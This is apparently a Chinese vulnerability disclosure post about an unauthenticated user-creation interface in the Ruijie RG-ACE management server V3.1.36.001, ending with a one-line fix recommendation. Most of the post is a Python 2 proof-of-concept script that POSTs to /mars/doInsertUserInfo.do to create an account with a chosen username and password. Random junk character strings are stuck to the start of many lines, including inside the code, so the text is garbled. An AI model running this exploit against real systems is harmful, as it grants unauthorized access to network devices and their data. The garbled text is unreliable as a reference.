锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）


! z/ a5 y8 {+ D3 `测试的具体版本是
: t' d/ f3 K, l3 L# `产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
编译时间: 201104291730


2 a; w; o0 b8 [% X3 `漏洞证明：
8 W/ B( p# B  R. N: |

% \( `- s' D4 J$ p

8 a6 Q6 ^% Y  W2 w- `0 ]" X
; p8 X  D$ k" A8 ], Q' V
执行脚本
/ `' m  [; M0 _#! /usr/bin/env python
#coding=gbk
5 j4 |1 h) B/ G  K; }" P8 B0 A#RG-ACE管理服务器 V3.1.36.001
3 Y  _' u" r  D6 Y) K/ ?4 |import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
! j- k( B6 [3 c9 I* }opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
2 A$ ]5 ?! {6 M. @1 ^( qopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
0 K* }  \4 s5 V# g+ E8 L# jpost=(("event","userManager.doInsertUserInfo"),
, ?* R+ J, E$ c("useractionname","addButtonValue"),
("useropermanager","userManager"),
5 ]6 c, X+ A2 o/ D("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
, g0 Q( {$ ~, N2 N+ M7 y/ i4 U! W& b("trueName","ad"),
4 d0 K1 \! W: V" D  Y6 p+ N( `6 W("email",""),
6 L8 h; X) D$ j. a3 l7 A("mobilePhone",""),
; y6 k( {# ^/ U" Q7 w6 }("officePhone",""),
2 Z0 @" i$ |, F: F( o("addr",""),
8 _4 {9 a' e1 u9 @* t("submit","确定"))
4 D4 Y, h- D$ X3 l, \, i- R# Kurllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
( T' ?; k8 _1 D" P  a" y8 r
登录，连接设备
! e. o6 n4 z. R; _  \$ @7 ~; @

7 y2 [7 c& @. a! A% t  B1 H
( ~$ p1 t8 y! ?# S* W
8 z9 U' J) [* m* d6 w  G
默认的管理员admin权限更大点
3 |; T# }1 `0 Z1 O1 m8 I
2 y+ R, ?1 K- M

+ m- k$ R- `" y' S/ B; O- v+ e

9 A  @: W$ M, ?; i! T修复方案：
& y$ g% E; G$ G, ~/ P1 }5 L加强对接口的权限验证

- n: I1 B5 W5 I) J% k